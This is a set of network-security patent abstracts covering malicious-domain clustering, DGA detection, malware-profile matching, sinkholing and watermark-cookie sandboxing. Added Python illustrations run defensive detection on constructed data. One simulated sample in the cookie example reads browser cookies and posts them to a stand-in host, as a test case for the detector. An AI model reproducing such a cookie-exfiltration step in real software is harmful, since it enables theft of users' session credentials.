-
Publication (announcement) number: US20240048579A1
Publication (announcement) date: 2024-02-08
Application number: US18481764
Application date: 2023-10-05
Inventors: Michael Edward Weber , Jun Wang , Yuchen Zhou , Wei Xu
IPC classification: H04L9/40 , H04L61/4511
CPC classification: H04L63/1425 , H04L63/0245 , H04L63/1441 , H04L61/4511
Abstract: The technology presented herein enables the use of a clustering algorithm to identify additional malicious domains based on known malicious domains. A domain identifier system identifies a first plurality of domain names associated with a malicious domain campaign and seeds a first clustering algorithm with the first plurality of domain names. After seeding the first clustering algorithm, the domain identifier system uses the first clustering algorithm to process passive domain name system (DNS) records to identify and group a second plurality of domain names associated with the malicious domain campaign.
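The abstract does not say which clustering algorithm is used. The following is an added illustration, not code from the patent or its assignee, of the simplest seeded variant a practitioner would try first: treat passive DNS as a bipartite graph between domain names and the infrastructure they resolve to (A records and NS records), start from the known campaign domains, and walk outwards to domains that share that infrastructure. All domain names, addresses and nameservers in the block are constructed; the hub threshold (`max_shared`) and hop limit are assumed knobs, not values from the patent.

```python
from collections import defaultdict, deque

# Constructed passive DNS records (query name, record type, rdata); not real data.
PASSIVE_DNS = [
    ("login-secure-update.com", "A", "203.0.113.10"),
    ("login-secure-update.com", "NS", "ns1.bulletproof-dns.example"),
    ("login-secure-update.com", "A", "198.51.100.5"),   # briefly parked on shared hosting
    ("account-verify-now.net", "A", "203.0.113.10"),
    ("account-verify-now.net", "NS", "ns1.bulletproof-dns.example"),
    ("invoice-portal-check.org", "A", "203.0.113.11"),
    ("invoice-portal-check.org", "NS", "ns1.bulletproof-dns.example"),
    ("payroll-docs-view.com", "A", "203.0.113.11"),
    ("payroll-docs-view.com", "NS", "ns2.other-dns.example"),
    # Unrelated sites on the same shared-hosting address as the seed.
    ("example-blog.com", "A", "198.51.100.5"),
    ("example-shop.com", "A", "198.51.100.5"),
    ("example-news.com", "A", "198.51.100.5"),
    ("example-wiki.com", "A", "198.51.100.5"),
    ("unrelated-site.com", "A", "192.0.2.77"),
]

SEEDS = {"login-secure-update.com"}   # the "first plurality": known campaign domains


def build_graph(records, max_shared=3):
    """Bipartite graph domain <-> (rrtype, rdata).

    Infrastructure shared by more than max_shared domains (shared hosting,
    large NS providers) is treated as a hub and left out of the graph;
    otherwise one such node would link the seeds to every domain behind it.
    The threshold of 3 is an assumption for this toy data set; real passive
    DNS needs a far larger cut-off and a provider allow-list."""
    infra_to_domains = defaultdict(set)
    for name, rtype, rdata in records:
        if rtype in ("A", "AAAA", "NS"):
            infra_to_domains[(rtype, rdata.lower())].add(name.lower())
    graph, hubs = defaultdict(set), set()
    for infra, domains in infra_to_domains.items():
        if len(domains) > max_shared:
            hubs.add(infra)
            continue
        for d in domains:
            graph[d].add(infra)
            graph[infra].add(d)
    return graph, hubs


def expand_campaign(records, seeds, max_shared=3, max_hops=2):
    """Breadth-first expansion from the seeds over shared infrastructure.

    Returns ({domain: hops}, hubs). hops is the number of domain-to-domain
    steps from a seed; seeds are 0, the newly grouped domains are >= 1."""
    graph, hubs = build_graph(records, max_shared)
    dist = {s.lower(): 0 for s in seeds}
    queue = deque(dist)
    while queue:
        d = queue.popleft()
        if dist[d] >= max_hops:
            continue            # do not expand beyond the hop budget
        for infra in graph.get(d, ()):
            for nb in graph[infra]:
                if nb not in dist:
                    dist[nb] = dist[d] + 1
                    queue.append(nb)
    return dist, hubs


if __name__ == "__main__":
    found, hubs = expand_campaign(PASSIVE_DNS, SEEDS)
    for name, hops in sorted(found.items(), key=lambda kv: kv[1]):
        print(f"{hops} hop(s): {name}")
    print("ignored hubs:", hubs)
```

The hop count doubles as a confidence score: a domain one hop away shares a resolver address or nameserver directly with a seed, while a two-hop domain only shares infrastructure with a one-hop domain, so a reviewer would want corroborating evidence (registration date, TLS certificate reuse) before blocking it.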
-
Publication (announcement) number: US20220224708A1
Publication (announcement) date: 2022-07-14
Application number: US17710886
Application date: 2022-03-31
Inventors: Zhaoyan Xu , Wei Xu , Kyle Sanders
IPC classification: H04L9/40
Abstract: Techniques for malware detection using watermark cookies are disclosed. In some embodiments, a system, process, and/or computer program product for malware detection using watermark cookies includes receiving a sample at a cloud security service; injecting a watermark cookie in a virtual environment to provide a modified virtual environment; detonating the sample in the modified virtual environment, wherein the modified virtual environment is instrumented for monitoring activities associated with the sample during automated malware analysis of the sample; detecting whether the watermark cookie was accessed in the modified virtual environment during the automated malware analysis of the sample; and determining whether the sample is malware based on whether the watermark cookie was accessed in the modified virtual environment.
-
Publication (announcement) number: US11283820B2
Publication (announcement) date: 2022-03-22
Application number: US16926415
Application date: 2020-07-10
IPC classification: H04L29/06 , G06F21/56 , H04W12/128 , G06F21/57
Abstract: Analysis of samples for maliciousness is disclosed. A sample is executed and one or more network activities associated with executing the sample are recorded. The recorded network activities are compared to a malware profile. The malware profile comprises a set of network activities taken by a known malicious application during execution of the known malicious application. A verdict of "malicious" is assigned to the sample based at least in part on a determination that the recorded network activities match the malware profile.
-
Publication (announcement) number: US20210409431A1
Publication (announcement) date: 2021-12-30
Application number: US17472464
Application date: 2021-09-10
Abstract: A malware profile is received. The malware profile comprises a set of n-tuples of attributes that describe one or more activities associated with executing a copy of a known malicious application that is associated with the malware profile. A set of one or more log entries is analyzed for a set of entries that matches the malware profile. Based at least in part on identifying the set of entries matching the malware profile, a determination is made that a host was compromised. In response to determining that the host has been compromised, a remedial action is taken with respect to the host.
-
Publication (announcement) number: US11032297B2
Publication (announcement) date: 2021-06-08
Application number: US16878377
Application date: 2020-05-19
Inventors: Wei Xu , Xin Ouyang
Abstract: Techniques for Domain Generation Algorithm (DGA) behavior detection are provided. In some embodiments, a system, process, and/or computer program product for DGA behavior detection includes receiving passive Domain Name System (DNS) data that comprises a plurality of DNS responses at a security device; and applying a signature to the passive DNS data to detect DGA behavior, in which applying the signature to the passive DNS data to detect DGA behavior further comprises: parsing each of the plurality of DNS responses to determine whether one or more of the plurality of DNS responses correspond to a non-existent domain (NXDOMAIN) response.
-
Publication (announcement) number: US10812501B2
Publication (announcement) date: 2020-10-20
Application number: US15886680
Application date: 2018-02-01
Inventors: Wei Xu , Xin Ouyang
Abstract: Techniques for Domain Generation Algorithm (DGA) behavior detection are provided. In some embodiments, a system, process, and/or computer program product for DGA behavior detection includes receiving passive Domain Name System (DNS) data that comprises a plurality of DNS responses at a security device; and applying a signature to the passive DNS data to detect DGA behavior, in which applying the signature to the passive DNS data to detect DGA behavior further comprises: parsing each of the plurality of DNS responses to determine whether one or more of the plurality of DNS responses correspond to a non-existent domain (NXDOMAIN) response.
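The two DGA entries above (US11032297B2 and its parent US10812501B2) share one abstract: parse passive DNS responses, pick out the NXDOMAIN ones, and apply a signature to them. The abstract does not state what the signature looks like. The block below is an added example, not the patent's own signature or code, of the kind of rule a detection engineer would write against that data: a burst of distinct NXDOMAIN names from one client within a short window, where the queried labels look random. The responses are constructed, and the window, count and entropy thresholds are assumed values for this sample, not values from the patent.

```python
import math
from collections import defaultdict

# Constructed passive DNS responses (epoch seconds, client, queried name, rcode).
RESPONSES = [
    (1000, "10.0.0.5", "www.example.com", "NOERROR"),
    (1001, "10.0.0.5", "mail.example.com", "NOERROR"),
    (1002, "10.0.0.5", "typo-exmaple.com", "NXDOMAIN"),        # a single typo
    # A DGA-infected client walking through its candidate list until one resolves.
    (1000, "10.0.0.9", "xk3b7qvp2m.info", "NXDOMAIN"),
    (1001, "10.0.0.9", "q8zt0wlfk4.info", "NXDOMAIN"),
    (1002, "10.0.0.9", "b19plxu5sq.net", "NXDOMAIN"),
    (1003, "10.0.0.9", "m3dkoq8rhy.com", "NXDOMAIN"),
    (1004, "10.0.0.9", "v7ncfw2za1.biz", "NXDOMAIN"),
    (1005, "10.0.0.9", "ht5pwz9rkl.org", "NXDOMAIN"),
    (1006, "10.0.0.9", "c2-rendezvous.net", "NOERROR"),
    # A misconfigured host hammering one missing name: many NXDOMAINs, one name.
    *[(1000 + i, "10.0.0.7", "old-printer.corp.example", "NXDOMAIN") for i in range(8)],
]


def shannon_entropy(s):
    """Bits per character of the string; ~3.3 for ten distinct characters."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname):
    """Label immediately left of the TLD. Naive on purpose: production code
    should use the public suffix list so that 'x.co.uk' yields 'x', not 'co'."""
    labels = qname.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def detect_dga_clients(responses, window_seconds=60, min_unique_nx=5, min_entropy=3.0):
    """Signature: >= min_unique_nx distinct NXDOMAIN labels from one client
    inside any window_seconds window, with mean label entropy >= min_entropy.
    Returns {client: details} for clients that trigger it."""
    per_client = defaultdict(list)
    for ts, client, qname, rcode in responses:
        if rcode == "NXDOMAIN":                      # the parsing step from the abstract
            per_client[client].append((ts, registrable_label(qname)))
    flagged = {}
    for client, events in per_client.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            labels = {lbl for ts, lbl in events[i:] if ts < start + window_seconds}
            if len(labels) < min_unique_nx:
                continue                             # repeats of one name do not count
            mean_ent = sum(shannon_entropy(l) for l in labels) / len(labels)
            if mean_ent < min_entropy:
                continue
            prev = flagged.get(client)
            if prev is None or len(labels) > prev["unique_nxdomain"]:
                flagged[client] = {
                    "window_start": start,
                    "unique_nxdomain": len(labels),
                    "mean_entropy": round(mean_ent, 2),
                }
    return flagged


if __name__ == "__main__":
    for client, info in detect_dga_clients(RESPONSES).items():
        print(client, info)
```

Counting distinct names rather than raw NXDOMAIN responses is what keeps the misconfigured printer client (eight failures, one name) out of the result; the entropy test is a cheap filter against typo traffic and will not catch word-list DGAs, which need a different signature.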
-
Publication (announcement) number: US20190238565A1
Publication (announcement) date: 2019-08-01
Application number: US15885388
Application date: 2018-01-31
IPC classification: H04L29/06
CPC classification: H04L63/1416 , H04L63/1425
Abstract: A malware profile is received. The malware profile comprises a set of one or more activities associated with executing a copy of a known malicious application that is associated with the malware profile. A set of one or more log entries is analyzed for a set of entries that matches the malware profile. Based at least in part on identifying the set of entries matching the malware profile, a determination is made that a host was compromised.
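Three entries on this page describe the same matching step from two sides: US11283820B2 compares the network activities recorded while detonating a sample against a malware profile to reach a verdict, and US20210409431A1 / US20190238565A1 (directly above) apply a profile to log entries to decide that a production host is compromised. The block below is an added example serving all three, not code from the patents or their assignee. It represents a profile as a list of attribute tuples plus a minimum match count, matches them against key=value entries from either source, and requires the matches to fall inside one time window on one host. The profile contents, the log format and every host, name and address in it are constructed.

```python
import datetime as dt
from collections import defaultdict

# Constructed profile: each activity is a tuple of attributes an entry must
# carry (the abstract's n-tuples). min_match is how many distinct activities
# must appear on one host within a single window.
PROFILE = {
    "name": "loader-family-x (hypothetical)",
    "activities": [
        {"type": "dns", "qname": "update-cdn-checks.example"},
        {"type": "connect", "dport": "8443"},
        {"type": "http", "method": "POST", "uri": "/gate.php"},
    ],
    "min_match": 3,
}

# Constructed sensor log lines in an assumed key=value format; not a real product format.
LOG_LINES = """\
2024-01-05T10:00:01Z host=ws-17 type=dns qname=update-cdn-checks.example
2024-01-05T10:00:02Z host=ws-17 type=connect dst=203.0.113.40 dport=8443
2024-01-05T10:00:03Z host=ws-17 type=http method=POST uri=/gate.php
2024-01-05T10:00:05Z host=ws-22 type=dns qname=update-cdn-checks.example
2024-01-05T10:30:00Z host=ws-22 type=http method=GET uri=/index.html
2024-01-05T11:00:00Z host=ws-31 type=connect dst=203.0.113.40 dport=8443
2024-01-05T14:00:00Z host=ws-31 type=http method=POST uri=/gate.php
"""

# Constructed network activities recorded while detonating one sample in a sandbox.
SANDBOX_ACTIVITIES = """\
2024-01-06T09:00:00Z host=sample-3f2a type=dns qname=update-cdn-checks.example
2024-01-06T09:00:01Z host=sample-3f2a type=connect dst=203.0.113.40 dport=8443
2024-01-06T09:00:02Z host=sample-3f2a type=http method=POST uri=/gate.php
"""


def parse_entries(text):
    """Turn key=value lines into dicts with a timezone-aware 'ts' field."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *pairs = line.split()
        entry = {"ts": dt.datetime.fromisoformat(ts.replace("Z", "+00:00"))}
        for p in pairs:
            k, _, v = p.partition("=")
            entry[k] = v
        entries.append(entry)
    return entries


def match_profile(entries, profile, window_seconds=600):
    """Return {host: [indices of matched activities]} for every host on which
    at least profile['min_match'] distinct activities occur inside some
    window_seconds-long window. Attribute matching is a subset test, so an
    entry may carry extra fields the profile does not mention."""
    by_host = defaultdict(list)
    for e in entries:
        by_host[e["host"]].append(e)
    hits = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        best = set()
        for i, anchor in enumerate(evs):            # slide the window over each start
            end = anchor["ts"] + dt.timedelta(seconds=window_seconds)
            matched = set()
            for e in evs[i:]:
                if e["ts"] > end:
                    break
                for idx, act in enumerate(profile["activities"]):
                    if all(e.get(k) == v for k, v in act.items()):
                        matched.add(idx)
            if len(matched) > len(best):
                best = matched
        if len(best) >= profile["min_match"]:
            hits[host] = sorted(best)
    return hits


def sandbox_verdict(activity_text, profile):
    """US11283820B2 side: recorded sample activities vs. profile -> verdict."""
    return "malicious" if match_profile(parse_entries(activity_text), profile) else "benign"


if __name__ == "__main__":
    print("compromised hosts:", match_profile(parse_entries(LOG_LINES), PROFILE))
    print("sandbox verdict:", sandbox_verdict(SANDBOX_ACTIVITIES, PROFILE))
```

With the defaults only ws-17 is reported: ws-22 shows one of the three activities, and ws-31 shows two but three hours apart. Loosening `min_match` to 2 and widening the window to four hours also reports ws-31, which is the trade-off the two knobs expose; profile activities that are common on their own (a POST to a generic path) should only ever count in combination.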
-
Publication (announcement) number: US10305927B2
Publication (announcement) date: 2019-05-28
Application number: US16054945
Application date: 2018-08-03
Inventors: Huagang Xie , Wei Xu , Nir Zuk
Abstract: Techniques for sinkholing bad network domains by registering the bad network domains on the Internet are provided. In some embodiments, sinkholing bad network domains by registering the bad network domains on the Internet includes determining that a network domain is a bad network domain, in which the bad network domain is determined to be associated with an identified malware (e.g., malware that has been identified and has been determined to be associated with the bad domain), and the bad network domain is sinkholed by registering the bad network domain with a sinkholed IP address; and identifying a host that is infected with the identified malware based on an attempt by the host to connect to the sinkholed IP address.
-
Publication (announcement) number: US10135786B2
Publication (announcement) date: 2018-11-20
Application number: US15383880
Application date: 2016-12-19
Inventors: Wei Xu
Abstract: Techniques for discovering and selecting candidates for sinkholing of network domains are provided. In some embodiments, a process for discovering and selecting candidates for sinkholing of network domains includes collecting passive DNS data from a plurality of security devices to discover candidates for sinkholing of domain names; selecting one or more domain names that are most commonly queried by distinct client devices based on the passive DNS data, wherein each of the one or more domain names is not yet registered; and automatically registering each of the one or more domain names with a domain registry to a sinkholed IP address in order to sinkhole each of the one or more domain names.
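The two sinkholing entries (US10305927B2 and US10135786B2 above) form one pipeline: pick the unregistered names that the most distinct clients are asking for, register them to a sinkhole address, then treat any host that connects to that address as infected. The block below is an added example of both halves, not code from the patents or their assignee. The registration step itself is left out, since it is an external API call; the passive DNS observations, the connection log, the sinkhole address and the thresholds are all constructed or assumed.

```python
from collections import defaultdict

SINKHOLE_IP = "192.0.2.100"   # assumed address the sinkholed names are registered to

# Constructed passive DNS observations (client, queried name, rcode).
PASSIVE_DNS = [
    ("10.1.1.10", "dga-a1b2c3.example", "NXDOMAIN"),
    ("10.1.1.11", "dga-a1b2c3.example", "NXDOMAIN"),
    ("10.1.1.12", "dga-a1b2c3.example", "NXDOMAIN"),
    ("10.1.1.10", "dga-a1b2c3.example", "NXDOMAIN"),    # same client again: counted once
    ("10.1.1.10", "dga-z9y8x7.example", "NXDOMAIN"),
    ("10.1.1.13", "dga-z9y8x7.example", "NXDOMAIN"),
    ("10.1.1.14", "dga-z9y8x7.example", "NXDOMAIN"),
    ("10.1.1.15", "dga-z9y8x7.example", "NXDOMAIN"),
    ("10.1.1.20", "typo-gogle.example", "NXDOMAIN"),     # too few distinct clients
    ("10.1.1.21", "typo-gogle.example", "NXDOMAIN"),
    ("10.1.1.30", "was-nx-now-live.example", "NXDOMAIN"),  # resolved later: already registered
    ("10.1.1.31", "was-nx-now-live.example", "NXDOMAIN"),
    ("10.1.1.32", "was-nx-now-live.example", "NXDOMAIN"),
    ("10.1.1.33", "was-nx-now-live.example", "NOERROR"),
    ("10.1.1.40", "www.example.com", "NOERROR"),
]

# Constructed connection log taken after sinkholing (src, dst, dport, TLS SNI or Host header).
CONNECTIONS = [
    ("10.1.1.10", SINKHOLE_IP, 443, "dga-a1b2c3.example"),
    ("10.1.1.10", SINKHOLE_IP, 443, "dga-z9y8x7.example"),
    ("10.1.1.13", SINKHOLE_IP, 80, "dga-z9y8x7.example"),
    ("10.1.1.50", "203.0.113.99", 443, "www.example.com"),
]


def select_sinkhole_candidates(records, top_n=2, min_clients=3):
    """Rank unregistered names by the number of distinct clients querying them.

    NXDOMAIN is used as the 'not yet registered' signal; a name that ever
    resolved (NOERROR) is dropped. Before actually registering, check RDAP or
    WHOIS, since NXDOMAIN can also mean a registered-but-unconfigured zone."""
    clients = defaultdict(set)
    registered = set()
    for client, qname, rcode in records:
        q = qname.lower().rstrip(".")
        if rcode == "NXDOMAIN":
            clients[q].add(client)
        elif rcode == "NOERROR":
            registered.add(q)
    ranked = sorted(
        (d for d, c in clients.items() if d not in registered and len(c) >= min_clients),
        key=lambda d: (-len(clients[d]), d),
    )
    return ranked[:top_n]


def find_infected_hosts(connections, sinkholed, sinkhole_ip=SINKHOLE_IP):
    """{source host: [sinkholed names it tried to reach]}.

    Requiring the SNI/Host to be one of the sinkholed names ties each hit to
    a known family instead of counting every packet that reaches the address."""
    infected = defaultdict(set)
    for src, dst, _dport, name in connections:
        if dst == sinkhole_ip and name.lower() in sinkholed:
            infected[src].add(name.lower())
    return {h: sorted(n) for h, n in infected.items()}


if __name__ == "__main__":
    cands = select_sinkhole_candidates(PASSIVE_DNS)
    print("register to sinkhole:", cands)
    print("infected:", find_infected_hosts(CONNECTIONS, set(cands)))
```

Two practical caveats on the second half: the sinkhole address also receives traffic from scanners and researchers, so a connection should be attributed to an infection only when it carries the expected name or protocol, and a host that queries a DGA name once is not necessarily beaconing; counting repeated attempts over time separates infections from curiosity.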
-
Publication (announcement) number: US20170262629A1
Publication (announcement) date: 2017-09-14
Application number: US15141742
Application date: 2016-04-28
Inventors: Zhaoyan Xu , Wei Xu , Kyle Sanders
IPC classification: G06F21/53
CPC classification: G06F21/53 , G06F21/54 , G06F21/56 , H04L63/1425 , H04L63/1491
Abstract: Techniques for cookies watermarking in malware analysis are disclosed. In some embodiments, a system, process, and/or computer program product for cookies watermarking in malware analysis includes receiving a sample at a cloud security service; detonating the sample in an instrumented virtual environment; and determining that the sample is malware based on detecting an attempt to access a watermark cookie during an automated malware analysis using the instrumented virtual environment.
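US20220224708A1 (earlier on this page) and US20170262629A1 above describe the same idea: plant a cookie with a value that no legitimate program has any reason to read, detonate the sample in an instrumented environment, and call it malware if the cookie is touched. The block below is an added example of that decision logic, not code from the patents or their assignee. The "virtual environment" is reduced to a small class whose file and network hooks record what the sample does; the cookie file name and format, the two sample functions and the exfiltration URL are all assumptions for the demonstration.

```python
import json
import os
import secrets
import tempfile


class InstrumentedEnv:
    """Stand-in for the instrumented sandbox. The sample can only reach files
    and the network through these hooks, so every access is recorded."""

    def __init__(self, profile_dir, cookie_path, watermark):
        self.profile_dir = profile_dir      # simulated browser profile directory
        self.cookie_path = cookie_path
        self.watermark = watermark
        self.file_reads = []
        self.outbound = []                  # (url, body) of every request sent

    def read_file(self, path):
        self.file_reads.append(os.path.abspath(path))
        with open(path, "r", encoding="utf-8") as f:
            return f.read()

    def http_post(self, url, body):
        self.outbound.append((url, body))


def prepare_env(workdir):
    """Inject the watermark cookie: a fresh random value stored where a
    browser would keep its cookies (assumed file name 'Cookies.json')."""
    watermark = secrets.token_hex(16)       # unique per detonation, so leaks are attributable
    cookie_path = os.path.join(workdir, "Cookies.json")
    cookies = [
        {"host": "bank.example", "name": "SESSIONID", "value": watermark},
        {"host": "news.example", "name": "theme", "value": "dark"},
    ]
    with open(cookie_path, "w", encoding="utf-8") as f:
        json.dump(cookies, f)
    return InstrumentedEnv(os.path.abspath(workdir), os.path.abspath(cookie_path), watermark)


def analyze(env, sample):
    """Detonate the sample and decide. The verdict follows the abstract: any
    access to the watermark cookie is enough; exfiltration of the value over
    the network is reported separately as corroborating evidence."""
    sample(env)
    accessed = env.cookie_path in env.file_reads
    exfiltrated = any(env.watermark in body for _, body in env.outbound)
    return {
        "cookie_accessed": accessed,
        "watermark_exfiltrated": exfiltrated,
        "verdict": "malware" if accessed else "benign",
    }


def run_analysis(sample):
    with tempfile.TemporaryDirectory() as workdir:
        return analyze(prepare_env(workdir), sample)


# Two constructed samples standing in for real submissions.
def benign_sample(env):
    env.http_post("https://updates.example/check", "version=1.2")


def stealer_sample(env):
    # Real stealers know the conventional cookie store locations; this one
    # reads the assumed file name inside the profile directory.
    cookies = json.loads(env.read_file(os.path.join(env.profile_dir, "Cookies.json")))
    env.http_post("https://drop.example/up", json.dumps(cookies))


if __name__ == "__main__":
    print("benign :", run_analysis(benign_sample))
    print("stealer:", run_analysis(stealer_sample))
```

Generating a new watermark for every run matters twice: the value cannot be on any allow-list a sample might carry, and if it later shows up in a credential dump or a sinkhole log it identifies exactly which detonation leaked it.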